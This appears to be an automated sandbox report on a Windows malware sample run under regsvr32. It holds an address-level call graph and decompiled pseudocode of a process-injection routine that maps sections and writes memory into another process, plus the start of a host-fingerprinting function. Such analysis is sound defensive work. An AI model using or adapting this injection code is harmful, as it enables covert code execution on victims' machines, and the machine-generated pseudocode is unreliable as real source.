13585 4992966 13583->13585 13602 4999d81 13584->13602 13588 4999930 2 API calls 13589 49928d5 13588->13589 13590 499109a 2 API calls 13589->13590 13589->13598 13591 49928e8 13590->13591 13592 4999a5a 2 API calls 13591->13592 13593 4992900 13592->13593 13594 4998baf 2 API calls 13593->13594 13595 499290e 13594->13595 13597 499b5fb 2 API calls 13595->13597 13601 499294c 13595->13601 13596 4998bf4 2 API calls 13596->13598 13599 499292c 13597->13599 13598->13583 13600 4998bf4 2 API calls 13599->13600 13600->13601 13601->13596 13603 49928ce 13602->13603 13604 4999d8a 13602->13604 13603->13588 13606 4998bde RtlAllocateHeap 13604->13606 13606->13603 13709 49926ec 13710 4992715 13709->13710 13711 49926fd 13709->13711 13740 49926b3 13710->13740 13717 4997002 13711->13717 13715 4999c2c 2 API calls 13716 499272e 13715->13716 13718 4997024 13717->13718 13731 499701c 13717->13731 13719 499c307 2 API calls 13718->13719 13720 499702d 13719->13720 13720->13731 13747 49a0e2d 13720->13747 13723 4997047 13724 4998bf4 2 API calls 13723->13724 13724->13731 13725 499979d 7 API calls 13726 499707a 13725->13726 13727 49965f6 5 API calls 13726->13727 13726->13731 13728 499708c 13727->13728 13729 4997099 13728->13729 13732 49970b1 13728->13732 13730 4998bf4 2 API calls 13729->13730 13730->13731 13731->13710 13733 4995e3c 8 API calls 13732->13733 13739 49970d1 13732->13739 13736 49970cd 13733->13736 13734 4998bf4 2 API calls 13735 49970fe 13734->13735 13737 4998bf4 2 API calls 13735->13737 13738 499aa65 6 API calls 13736->13738 13736->13739 13737->13723 13738->13739 13739->13734 13741 499c307 2 API calls 13740->13741 13742 49926c4 13741->13742 13745 49926db 13742->13745 13746 49926e8 13742->13746 13758 499ac2f 13742->13758 13744 4998bf4 2 API calls 13744->13746 13745->13744 13746->13715 13748 49a0e78 13747->13748 13749 49a0e3c 13747->13749 13757 4998bde RtlAllocateHeap 13748->13757 13750 4998bf4 2 API calls 13749->13750 13752 49a0e45 13750->13752 13753 4998c43 RtlAllocateHeap 13752->13753 
13755 4997041 13752->13755 13754 49a0e5c 13753->13754 13754->13755 13756 499fba1 lstrlenW 13754->13756 13755->13723 13755->13725 13756->13755 13757->13752 13759 499ac4b 6 API calls 13758->13759 13760 499ac46 13759->13760 13760->13745 11227 49964ef 11228 4996555 11227->11228 11229 49964fd 11227->11229 11256 4998bc9 HeapCreate 11229->11256 11231 4996502 11257 4999591 11231->11257 11240 499655a 11277 4998baf 11240->11277 11241 4996550 11242 4998baf 2 API calls 11241->11242 11242->11228 11249 49965b1 CreateThread 11249->11228 11357 4996298 11249->11357 11250 499f05c 8 API calls 11251 499658c 11250->11251 11290 4996370 memset 11251->11290 11256->11231 11309 4998bde RtlAllocateHeap 11257->11309 11259 4996507 11260 49a3cd5 11259->11260 11261 49a3d0a 11260->11261 11310 4998c43 11261->11310 11263 4996515 11264 499f05c 11263->11264 11314 4999dd8 11264->11314 11267 499f07e GetModuleHandleA 11269 499f08d 11267->11269 11268 499f086 LoadLibraryA 11268->11269 11270 499f09b 11269->11270 11317 499f011 11269->11317 11322 4998b9c 11270->11322 11274 4999df2 11340 4998ac6 11274->11340 11278 4998bbd 11277->11278 11279 499655f 11277->11279 11280 4998bf4 2 API calls 11278->11280 11281 499109a 11279->11281 11280->11279 11282 4998ac6 2 API calls 11281->11282 11283 49910b5 11282->11283 11284 4999cb5 11283->11284 11286 4999cd1 11284->11286 11285 4996573 11285->11249 11285->11250 11286->11285 11346 4998bde RtlAllocateHeap 11286->11346 11288 4999ce4 11288->11285 11289 4998bf4 2 API calls 11288->11289 11289->11285 11347 4991080 11290->11347 11292 499639c 11293 49963ad 11292->11293 11294 49963ec 11292->11294 11296 4991080 2 API calls 11293->11296 11295 4991080 2 API calls 11294->11295 11298 49963f6 11295->11298 11297 49963b5 11296->11297 11350 4999e12 11297->11350 11302 4998b9c 2 API calls 11298->11302 11300 49963cb 11301 4998b9c 2 API calls 11300->11301 11303 49963d6 11301->11303 11302->11303 11304 4998bf4 11303->11304 11305 49965a1 11304->11305 11306 4998bfe 11304->11306 11305->11249 
11306->11305 11307 4998d6d memset 11306->11307 11308 4998c2e HeapFree 11307->11308 11308->11305 11309->11259 11313 4998bde RtlAllocateHeap 11310->11313 11312 4998c54 11312->11263 11313->11312 11326 49989ef 11314->11326 11333 4998bde RtlAllocateHeap 11317->11333 11319 499f023 11321 499f052 11319->11321 11334 499eebb 11319->11334 11321->11270 11323 499652b 11322->11323 11324 4998ba4 11322->11324 11323->11274 11325 4998bf4 2 API calls 11324->11325 11325->11323 11327 4998a12 lstrlenA 11326->11327 11329 4998a78 11327->11329 11331 4998a81 11327->11331 11332 4998bde RtlAllocateHeap 11329->11332 11331->11267 11331->11268 11332->11331 11333->11319 11335 499ef2f 11334->11335 11336 499eed4 11334->11336 11335->11319 11336->11335 11337 499ef87 LoadLibraryA 11336->11337 11337->11335 11338 499ef95 GetProcAddress 11337->11338 11338->11335 11339 499efa1 11338->11339 11339->11335 11342 4998ae4 lstrlenA 11340->11342 11345 4998bde RtlAllocateHeap 11342->11345 11344 499653c GetFileAttributesW 11344->11240 11344->11241 11345->11344 11346->11288 11348 49989ef 2 API calls 11347->11348 11349 4991096 11348->11349 11349->11292 11354 4998d6d 11350->11354 11353 4999e40 11353->11300 11355 4998d87 _vsnprintf 11354->11355 11356 4998d76 memset 11354->11356 11355->11353 11356->11355 11369 4996412 11357->11369 11361 49962a9 11363 49962e3 11361->11363 11368 49962b3 11361->11368 11432 499d804 11361->11432 11364 499631a 11363->11364 11365 4996313 11363->11365 11364->11368 11470 49935a1 11364->11470 11448 499611b 11365->11448 11370 499f05c 8 API calls 11369->11370 11371 4996426 11370->11371 11372 499f05c 8 API calls 11371->11372 11373 499643f 11372->11373 11374 499f05c 8 API calls 11373->11374 11375 4996458 11374->11375 11376 499f05c 8 API calls 11375->11376 11377 4996471 11376->11377 11378 499f05c 8 API calls 11377->11378 11379 499648a 11378->11379 11380 499f05c 8 API calls 11379->11380 11381 49964a1 11380->11381 11382 499f05c 8 API calls 11381->11382 11383 49964b8 11382->11383 11384 499f05c 8 API 
calls 11383->11384 11385 49964cf 11384->11385 11386 499f05c 8 API calls 11385->11386 11387 499629d GetOEMCP 11386->11387 11388 499df3d 11387->11388 11477 4998bde RtlAllocateHeap 11388->11477 11390 499df58 11391 499e2b8 11390->11391 11392 499df63 GetCurrentProcessId 11390->11392 11391->11361 11393 499df7b 11392->11393 11478 499c879 11393->11478 11395 499dfce 11396 499dfdf 11395->11396 11485 499c8c9 11395->11485 11494 499f3a3 11396->11494 11401 499e014 LookupAccountSidW 11402 499e05e GetLastError 11401->11402 11403 499e064 GetSystemMetrics 11401->11403 11402->11403 11405 499e08b 11403->11405 11503 499c6ce 11405->11503 11410 499e0c6 11520 499c6e4 11410->11520 11415 4998d6d memset 11416 499e11d GetVersionExA 11415->11416 11539 499dd39 11416->11539 11420 499e13b GetWindowsDirectoryW 11421 4999df2 2 API calls 11420->11421 11422 499e15e 11421->11422 11423 4998baf 2 API calls 11422->11423 11424 499e198 11423->11424 11426 499e1d0 11424->11426 11562 4999e51 11424->11562 11545 49a351a 11426->11545 11641 499d6dc 11432->11641 11435 499d950 11435->11363 11437 499d945 11438 4998bf4 2 API calls 11437->11438 11438->11435 11439 499d933 11439->11437 11440 4998bf4 2 API calls 11439->11440 11440->11439 11441 4998d6d memset 11447 499d841 11441->11447 11444 499d8b4 GetLastError 11671 499da57 ResumeThread 11444->11671 11446 499d8de FindCloseChangeNotification 11446->11447 11447->11437 11447->11439 11447->11441 11447->11444 11447->11446 11653 499bc84 11447->11653 11658 499d959 11447->11658 11741 499a608 11448->11741 11451 499612a 11451->11368 11452 4996142 11757 4996247 11452->11757 11455 4996147 11456 4996151 11455->11456 11457 49961a0 11455->11457 11459 49961a5 11456->11459 11460 4996156 11456->11460 11791 499600c 11457->11791 11461 499619e 11459->11461 11462 49961c1 11459->11462 11804 49a0a67 11459->11804 11460->11462 11465 499b557 7 API calls 11460->11465 11825 4995ff2 11461->11825 11462->11368 11466 4996176 11465->11466 11768 4995edd 11466->11768 13041 4998bde RtlAllocateHeap 
11470->13041 11472 49935a8 11473 49935df 11472->11473 13042 4998bde RtlAllocateHeap 11472->13042 11473->11368 11475 49935b9 11475->11473 11476 49996da 2 API calls 11475->11476 11476->11473 11477->11390 11479 499c890 11478->11479 11480 499c894 11479->11480 11566 499c862 11479->11566 11480->11395 11483 499c8b9 FindCloseChangeNotification 11484 499c8a5 11483->11484 11484->11395 11579 499c79e GetCurrentThread OpenThreadToken 11485->11579 11488 499c97f 11488->11396 11489 499c7f5 6 API calls 11493 499c8fd FindCloseChangeNotification 11489->11493 11491 499c975 11492 4998bf4 2 API calls 11491->11492 11492->11488 11493->11488 11493->11491 11495 499f3c2 11494->11495 11497 499e009 11495->11497 11584 49998bd 11495->11584 11498 499f368 11497->11498 11499 499f37f 11498->11499 11500 499f39f 11499->11500 11501 49998bd RtlAllocateHeap 11499->11501 11500->11401 11502 499f38c 11501->11502 11502->11401 11589 499c5ec 11503->11589 11505 499c6e2 11506 499c4c1 11505->11506 11507 499c4dc 11506->11507 11508 4999dd8 2 API calls 11507->11508 11509 499c4e6 11508->11509 11604 49a3674 11509->11604 11511 499c4fb 11512 499c531 11511->11512 11515 49a3674 2 API calls 11511->11515 11513 4998b9c 2 API calls 11512->11513 11514 499c53d 11513->11514 11516 49999df 11514->11516 11515->11511 11517 49999eb MultiByteToWideChar 11516->11517 11518 49999e6 11516->11518 11519 49999ff 11517->11519 11518->11410 11519->11410 11521 4999dd8 2 API calls 11520->11521 11522 499c6fd 11521->11522 11523 4999dd8 2 API calls 11522->11523 11525 499c709 11523->11525 11524 499c799 11533 499ca46 11524->11533 11525->11524 11526 49a3674 2 API calls 11525->11526 11527 499c75a 11525->11527 11526->11525 11528 49a3674 2 API calls 11527->11528 11529 499c785 11527->11529 11528->11527 11530 4998b9c 2 API calls 11529->11530 11531 499c791 11530->11531 11532 4998b9c 2 API calls 11531->11532 11532->11524 11534 499ca5e 11533->11534 11535 499c7f5 6 API calls 11534->11535 11536 499ca62 11534->11536 11538 499ca76 11535->11538 11536->11415 11537 
4998bf4 2 API calls 11537->11536 11538->11536 11538->11537 11540 499dd5f 11539->11540 11541 499dd4e GetCurrentProcess IsWow64Process 11539->11541 11542 499dd62 11540->11542 11541->11540 11543 499dd6c 11542->11543 11544 499dd71 GetSystemInfo 11542->11544 11543->11420 11544->11420 11546 499e299 11545->11546 11547 49a3525 11545->11547 11549 49996da 11546->11549 11547->11546 11548 49a3674 2 API calls 11547->11548 11548->11547 11609 4999662 11549->11609 11563 4998d6d memset 11562->11563 11564 4999e65 _vsnwprintf 11563->11564 11565 4999e82 11564->11565 11565->11426 11569 499c7f5 GetTokenInformation 11566->11569 11570 499c834 11569->11570 11571 499c817 GetLastError 11569->11571 11570->11483 11570->11484 11571->11570 11572 499c822 11571->11572 11578 4998bde RtlAllocateHeap 11572->11578 11574 499c82a 11574->11570 11575 499c838 GetTokenInformation 11574->11575 11575->11570 11576 499c84d 11575->11576 11577 4998bf4 2 API calls 11576->11577 11577->11570 11578->11574 11580 499c7bf GetLastError 11579->11580 11582 499c7eb 11579->11582 11581 499c7cc OpenProcessToken 11580->11581 11580->11582 11581->11582 11582->11488 11582->11489 11585 49998c6 11584->11585 11587 49998d8 11584->11587 11588 4998bde RtlAllocateHeap 11585->11588 11587->11497 11588->11587 11590 4998d6d memset 11589->11590 11591 499c60e lstrcpynW 11590->11591 11593 4999df2 2 API calls 11591->11593 11594 499c643 GetVolumeInformationW 11593->11594 11595 4998baf 2 API calls 11594->11595 11596 499c678 11595->11596 11597 4999e51 2 API calls 11596->11597 11598 499c699 lstrcatW 11597->11598 11602 499a456 11598->11602 11601 499c6bf 11601->11505 11603 499a45e CharUpperBuffW 11602->11603 11603->11601 11605 49a3684 11604->11605 11606 49a36b7 lstrlenW 11605->11606 11607 49a36d4 _ftol2_sse 11606->11607 11607->11511 11610 4999672 11609->11610 11610->11610 11642 499d6fb 11641->11642 11672 4998bde RtlAllocateHeap 11642->11672 11644 499d796 11645 4999df2 2 API calls 11644->11645 11646 499d7f3 11644->11646 11647 4998baf 2 API calls 
11644->11647 11648 49998bd RtlAllocateHeap 11644->11648 11645->11644 11646->11435 11649 499b557 11646->11649 11647->11644 11648->11644 11650 499b570 11649->11650 11673 499b4a6 11650->11673 11654 4998d6d memset 11653->11654 11655 499bc9a 11654->11655 11656 4998d6d memset 11655->11656 11657 499bca7 CreateProcessW 11656->11657 11657->11447 11682 499d218 11658->11682 11665 4998d6d memset 11666 499d99f GetThreadContext 11665->11666 11667 499d9c9 NtProtectVirtualMemory 11666->11667 11668 499da49 11666->11668 11667->11668 11669 499da0b NtWriteVirtualMemory 11667->11669 11729 499d38b 11668->11729 11669->11668 11670 499da28 NtProtectVirtualMemory 11669->11670 11670->11668 11671->11447 11672->11644 11674 49a351a 2 API calls 11673->11674 11675 499b4be 11674->11675 11676 4999dd8 2 API calls 11675->11676 11677 499b4e8 11676->11677 11678 4999e12 2 API calls 11677->11678 11679 499b546 11678->11679 11680 4998b9c 2 API calls 11679->11680 11681 499b551 11680->11681 11681->11447 11683 499d234 11682->11683 11684 499d246 11682->11684 11683->11684 11685 499d373 11683->11685 11686 4999df2 2 API calls 11684->11686 11685->11668 11708 499d447 11685->11708 11687 499d253 11686->11687 11688 4999e51 2 API calls 11687->11688 11689 499d28c 11688->11689 11690 4999df2 2 API calls 11689->11690 11691 499d2ab 11690->11691 11734 4999a5a 11691->11734 11694 4998baf 2 API calls 11695 499d2d3 11694->11695 11696 4999a5a 2 API calls 11695->11696 11697 499d2f6 LoadLibraryW 11696->11697 11699 499d321 11697->11699 11700 499d32f 11697->11700 11701 499f011 3 API calls 11699->11701 11702 4998bf4 2 API calls 11700->11702 11701->11700 11703 499d344 11702->11703 11704 4998d6d memset 11703->11704 11705 499d356 11704->11705 11705->11685 11706 4998bf4 2 API calls 11705->11706 11707 499d371 11706->11707 11707->11685 11709 499d47a 11708->11709 11710 499d49b NtCreateSection 11709->11710 11714 499d68e 11709->11714 11711 499d4c4 RegisterClassExA 11710->11711 11710->11714 11712 499d518 CreateWindowExA 11711->11712 11713 
499d554 NtMapViewOfSection 11711->11713 11712->11713 11716 499d542 DestroyWindow UnregisterClassA 11712->11716 11713->11714 11721 499d587 NtMapViewOfSection 11713->11721 11715 499d6c3 11714->11715 11720 499d6bf NtUnmapViewOfSection 11714->11720 11717 499d6cc NtClose 11715->11717 11718 499d6d7 11715->11718 11716->11713 11717->11718 11718->11665 11718->11668 11720->11715 11721->11714 11722 499d5ab 11721->11722 11723 4998c43 RtlAllocateHeap 11722->11723 11724 499d5bb 11723->11724 11724->11714 11725 499d5ca VirtualAllocEx WriteProcessMemory 11724->11725 11726 4998bf4 2 API calls 11725->11726 11727 499d611 11726->11727 11728 499d674 lstrlenW 11727->11728 11728->11714 11730 499d3a2 11729->11730 11731 499d394 FreeLibrary 11729->11731 11732 499d3c3 11730->11732 11733 4998bf4 2 API calls 11730->11733 11731->11730 11732->11447 11733->11732 11735 4999a6c 11734->11735 11740 4998bde RtlAllocateHeap 11735->11740 11737 4999a8b 11738 4999aa8 11737->11738 11739 4999a97 lstrcatW 11737->11739 11738->11694 11739->11737 11740->11737 11829 499a633 11741->11829 11744 49a0c7b 11893 4998bde RtlAllocateHeap 11744->11893 11746 49a0c82 11747 49a0c8c 11746->11747 11894 499b3c7 11746->11894 11747->11452 11750 49a0cd0 11750->11452 11755 49a0a67 14 API calls 11756 49a0ccd 11755->11756 11756->11452 11931 4995ce2 11757->11931 11760 4996250 11760->11455 11761 4995edd 10 API calls 11762 4996267 11761->11762 11763 4996270 11762->11763 11934 499a9d6 11762->11934 11763->11455 11766 499627d lstrcmpiW 11766->11455 11767 4996295 11767->11455 11769 499b557 7 API calls 11768->11769 11770 4995ef6 11769->11770 11771 4995f03 11770->11771 11772 4999a07 2 API calls 11770->11772 11773 4995f26 11772->11773 11961 4995ed4 11773->11961 11775 4995f36 11776 4995f5a 11775->11776 11779 4995ed4 2 API calls 11775->11779 11777 4998bf4 2 API calls 11776->11777 11778 4995f66 11777->11778 11780 49960bf 11778->11780 11779->11776 11781 499a9d6 4 API calls 11780->11781 11782 49960c9 11781->11782 11783 49960d2 11782->11783 11784 
49960d7 lstrcmpiW 11782->11784 11783->11461 11785 4996109 11784->11785 11786 49960ed 11784->11786 11787 4998bf4 2 API calls 11785->11787 11966 499aace 11786->11966 11787->11783 12015 4998bde RtlAllocateHeap 11791->12015 11793 499601e 11794 4996031 GetDriveTypeW 11793->11794 11795 4996062 11793->11795 11794->11795 12016 4992be4 11795->12016 11797 499607e 11798 499609c 11797->11798 12031 49953c7 11797->12031 12101 499afd6 11798->12101 11802 499afd6 2 API calls 11803 49960b8 11802->11803 11803->11459 11805 499109a 2 API calls 11804->11805 11806 49a0a76 11805->11806 12676 49966c7 memset 11806->12676 11809 4998baf 2 API calls 11810 49a0a9c 11809->11810 11813 49a0b15 11810->11813 12688 499a96c 11810->12688 11813->11461 11815 49a0ac7 11815->11813 11816 499109a 2 API calls 11815->11816 11817 49a0ad9 11816->11817 11818 4999e51 2 API calls 11817->11818 11819 49a0ae8 11818->11819 11820 499b5fb 2 API calls 11819->11820 11821 49a0afb 11820->11821 11822 49a0b09 11821->11822 12692 499add4 11821->12692 11824 4998bf4 2 API calls 11822->11824 11824->11813 11826 4996004 11825->11826 12705 4995c22 11826->12705 11868 4998bde RtlAllocateHeap 11829->11868 11831 499a65d 11832 4996126 11831->11832 11869 499c43a 11831->11869 11832->11451 11832->11452 11832->11744 11835 4999dd8 2 API calls 11836 499a69d 11835->11836 11837 499a7db 11836->11837 11841 499a6c9 11836->11841 11838 499a7ed 11837->11838 11839 499a82c 11837->11839 11842 4999a07 2 API calls 11838->11842 11863 499a7d7 11838->11863 11840 4999a07 2 API calls 11839->11840 11840->11863 11841->11863 11879 4999a07 11841->11879 11842->11863 11843 4998b9c 2 API calls 11846 499a84c 11843->11846 11845 4998bf4 2 API calls 11847 499a8e2 11845->11847 11846->11845 11858 499a8a7 11846->11858 11850 4998d6d memset 11847->11850 11848 499a791 11855 4999a07 2 API calls 11848->11855 11850->11858 11851 4999df2 2 API calls 11852 499a72f 11851->11852 11853 4999a5a 2 API calls 11852->11853 11856 499a741 11853->11856 11854 4998bf4 2 API calls 11854->11832 11857 
499a7b8 11855->11857 11859 4998baf 2 API calls 11856->11859 11861 4998bf4 2 API calls 11857->11861 11858->11854 11858->11858 11860 499a74f 11859->11860 11885 4999930 11860->11885 11861->11863 11863->11843 11865 4998bf4 2 API calls 11866 499a786 11865->11866 11867 4998bf4 2 API calls 11866->11867 11867->11848 11868->11831 11870 499c453 11869->11870 11871 49a3674 2 API calls 11870->11871 11872 499c463 11871->11872 11873 4999dd8 2 API calls 11872->11873 11874 499c472 11873->11874 11875 499c4ae 11874->11875 11877 49a3674 2 API calls 11874->11877 11876 4998b9c 2 API calls 11875->11876 11878 499a67e 11876->11878 11877->11874 11878->11835 11881 4999a19 11879->11881 11891 4998bde RtlAllocateHeap 11881->11891 11882 4999a36 11883 4999a53 11882->11883 11884 4999a42 lstrcatA 11882->11884 11883->11846 11883->11848 11883->11851 11884->11882 11886 4999939 11885->11886 11887 4999966 11885->11887 11892 4998bde RtlAllocateHeap 11886->11892 11887->11865 11889 499994b 11889->11887 11890 4999953 MultiByteToWideChar 11889->11890 11890->11887 11891->11882 11892->11889 11893->11746 11895 499b3d8 11894->11895 11896 499b3df 11894->11896 11895->11750 11900 49a0b23 11895->11900 11896->11895 11897 499b409 11896->11897 11925 4998bde RtlAllocateHeap 11896->11925 11897->11895 11899 4998bf4 2 API calls 11897->11899 11899->11895 11926 4998bde RtlAllocateHeap 11900->11926 11902 49a0b36 11903 499109a 2 API calls 11902->11903 11905 49a0c28 11902->11905 11908 49a0c73 11902->11908 11904 49a0b6f 11903->11904 11907 4999df2 2 API calls 11904->11907 11906 4998bf4 2 API calls 11905->11906 11906->11908 11909 49a0b93 11907->11909 11921 499fba1 11908->11921 11910 4999a5a 2 API calls 11909->11910 11911 49a0bb1 11910->11911 11912 499b3c7 3 API calls 11911->11912 11913 49a0bbe 11912->11913 11914 4998baf 2 API calls 11913->11914 11915 49a0bca 11914->11915 11916 4998baf 2 API calls 11915->11916 11918 49a0bd3 11916->11918 11917 4998bf4 2 API calls 11919 49a0c1d 11917->11919 11918->11917 11920 4998bf4 2 API calls 

Control-flow Graph

C-Code - Quality: 95%
E0499D447(void* __ecx, intOrPtr __edx) {
	void* _v8;
	void* _v12;
	void* _v16;
	void* _v20;
	long _v24;
	long _v28;
	short _v32;
	char _v36;
	intOrPtr* _v40;
	intOrPtr _v44;
	long _v48;
	void* _v52;
	void* _v53;
	char _v64;
	short _v68;
	struct _WNDCLASSEXA _v116;
	char _t81;
	intOrPtr* _t83;
	intOrPtr _t87;
	intOrPtr _t90;
	char _t97;
	short _t98;
	intOrPtr _t105;
	long _t107;
	char _t119;
	void* _t124;
	struct HWND__* _t132;
	void* _t138;
	void* _t147;
	void* _t154;
	intOrPtr _t155;
	intOrPtr _t157;
	void* _t158;
	void* _t163;
	void* _t165;

	_t81 =  *0x49af81c; // 0x4bdfbe8
	_t138 = 0;
	_v12 = __ecx;
	_t157 = __edx;
	_v20 = 0;
	_v52 = 0;
	_v48 = 0;
	_v16 = 0;
	_v8 = 0;
	_v24 = 0;
	_v44 = __edx;
	if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
		E0499F0DE(0x1f4);
	}
	_t12 = _t157 + 0x3c; // 0x852c50ff
	_t83 =  *_t12 + _t157;
	_v28 = _t138;
	_v40 = _t83;
	if( *_t83 != 0x4550) {
		L14:
		_t158 = _v12;
		L15:
		if(_v8 != _t138) {
			_t90 =  *0x49af918; // 0x4bdf9f0
			 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
			_v8 = _t138;
		}
		L17:
		if(_v16 != 0) {
			_t87 =  *0x49af818; // 0x4bdf8b0
			NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
		}
		if(_v20 != 0) {
			NtClose(_v20);
		}
		return _v8;
	}
	_v52 =  *((intOrPtr*)(_t83 + 0x50));
	if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
		goto L14;
	}
	_t97 =  *"18293"; // 0x39323831
	_v36 = _t97;
	_t98 =  *0x49ace44; // 0x33
	_v32 = _t98;
	_v116.lpszClassName =  &_v64;
	asm("movsd");
	_v116.lpfnWndProc = DefWindowProcW;
	_v116.cbWndExtra = _t138;
	asm("movsd");
	_v116.style = 0xb;
	_v116.lpszMenuName = _t138;
	_v116.cbSize = 0x30;
	asm("movsb");
	_v116.cbClsExtra = _t138;
	_v116.hInstance = _t138;
	if(RegisterClassExA( &_v116) != 0) {
		_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
		if(_t132 != 0) {
			DestroyWindow(_t132);
			UnregisterClassA( &_v64, _t138);
		}
	}
	_t105 =  *0x49af818; // 0x4bdf8b0
	_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
	_t158 = _v12;
	if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
		goto L15;
	} else {
		_t154 = E04998C43( *0x49af81c, 0x1ac4);
                                                                                                                                                                                              					_v36 = _t154;
                                                                                                                                                                                              					if(_t154 == 0) {
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
                                                                                                                                                                                              					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
                                                                                                                                                                                              					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
                                                                                                                                                                                              					E04998BF4( &_v36, 0x1ac4);
                                                                                                                                                                                              					_t119 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              					_t155 =  *0x49af830; // 0x4990000
                                                                                                                                                                                              					_v36 = _t119;
                                                                                                                                                                                              					 *0x49af830 = _v8;
                                                                                                                                                                                              					 *0x49af81c = _t163;
                                                                                                                                                                                              					E04998CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
                                                                                                                                                                                              					E0499D3C6(_v16, _v8, _v44);
                                                                                                                                                                                              					_t124 = E0499A43D("quatr");
                                                                                                                                                                                              					_v53 = _t138;
                                                                                                                                                                                              					_t147 = 0xf;
                                                                                                                                                                                              					if(_t124 > _t147) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							L12:
                                                                                                                                                                                              							_t63 = _t138 + 0x41; // 0x41
                                                                                                                                                                                              							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
                                                                                                                                                                                              							_t138 = _t138 + 1;
                                                                                                                                                                                              						} while (_t138 < _t147);
                                                                                                                                                                                              						L13:
                                                                                                                                                                                              						lstrlenW( &_v68);
                                                                                                                                                                                              						 *0x49af830 = _t155;
                                                                                                                                                                                              						 *0x49af81c = _v36;
                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t147 = _t124;
                                                                                                                                                                                              					if(_t147 == 0) {
                                                                                                                                                                                              						goto L13;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}


                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtCreateSection.NTDLL(0499D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0499D4B9
                                                                                                                                                                                              • RegisterClassExA.USER32(?), ref: 0499D50D
                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 0499D538
                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 0499D543
                                                                                                                                                                                              • UnregisterClassA.USER32 ref: 0499D54E
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(0499D982,00000000), ref: 0499D579
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(0499D982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0499D5A0
                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0499D5E6
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0499D600
                                                                                                                                                                                                • Part of subcall function 04998BF4: HeapFree.KERNEL32(00000000,00000000), ref: 04998C3A
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,049961C5), ref: 0499D678
                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000), ref: 0499D6C0
                                                                                                                                                                                              • NtClose.NTDLL(00000000), ref: 0499D6D4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                                              • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                                              • API String ID: 494031690-2640591812
                                                                                                                                                                                              • Opcode ID: 69f686e7e674b42e8f552525fd833f4674a94370f4b207ad2331b7a61f2ca18d
                                                                                                                                                                                              • Instruction ID: f5971a35f3a9fd01d95611e19a1dc8bea88e1aa051be1be4bc7b2e386805a4b0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 69f686e7e674b42e8f552525fd833f4674a94370f4b207ad2331b7a61f2ca18d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6581F4B1E04219AFEB10DF98D884AEEBBF8FF08304F144179E605A7250D774AE55CBA5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E0499DF3D(void* __fp0) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				union _SID_NAME_USE _v16;
                                                                                                                                                                                              				char _v144;
                                                                                                                                                                                              				short _v656;
                                                                                                                                                                                              				char _v668;
                                                                                                                                                                                              				char _v2644;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				struct _OSVERSIONINFOA* _t68;
                                                                                                                                                                                              				intOrPtr _t70;
                                                                                                                                                                                              				void* _t71;
                                                                                                                                                                                              				intOrPtr _t73;
                                                                                                                                                                                              				void* _t74;
                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                              				void** _t77;
                                                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                                                              				intOrPtr _t80;
                                                                                                                                                                                              				intOrPtr _t81;
                                                                                                                                                                                              				int _t90;
                                                                                                                                                                                              				intOrPtr _t92;
                                                                                                                                                                                              				void* _t93;
                                                                                                                                                                                              				void* _t97;
                                                                                                                                                                                              				intOrPtr _t99;
                                                                                                                                                                                              				intOrPtr _t101;
                                                                                                                                                                                              				short _t106;
                                                                                                                                                                                              				long _t108;
                                                                                                                                                                                              				intOrPtr _t113;
                                                                                                                                                                                              				intOrPtr _t116;
                                                                                                                                                                                              				intOrPtr _t119;
